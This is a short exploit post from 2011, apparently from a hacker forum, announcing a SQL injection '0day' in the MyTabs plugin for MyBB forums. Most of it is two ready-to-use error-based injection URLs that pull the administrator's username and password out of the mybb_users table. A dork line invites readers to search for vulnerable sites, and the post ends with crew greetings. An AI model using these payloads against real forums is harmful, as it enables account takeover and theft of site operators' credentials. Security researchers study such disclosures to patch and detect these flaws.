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MyBB MyTabs (plugin) 0day SQL injection vulnerability

MyBB 0day MyTabs (plugin) SQL injection vulnerability

# Exploit title : MyBB 0day MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US ,
# Date : 01 08 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Vulnerable Software Link :
# Google dork : Use your mind kid ^_^ !

Vulnerability :

$~ http://localhost/mybbpath/index.php?tab=[SQLi]

# ~ Expl0itation ~ #

$~ Get the administrator’s username (usually it has uid=1) ~

http://localhost/mybbpath/index.php?tab=1′ and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)– –

$~ Get the administrator’s password ~

http://localhost/mybbpath/index.php?tab=1′ and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)– –

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# Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , R-t33n , Ace Wizard, KubaNnez1 , ssgodfather, DJDukli , b4ti , CroSs HackForums.AL members & All our friends.

____ _ ____ ____ _ _ _ _ _
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# 2011



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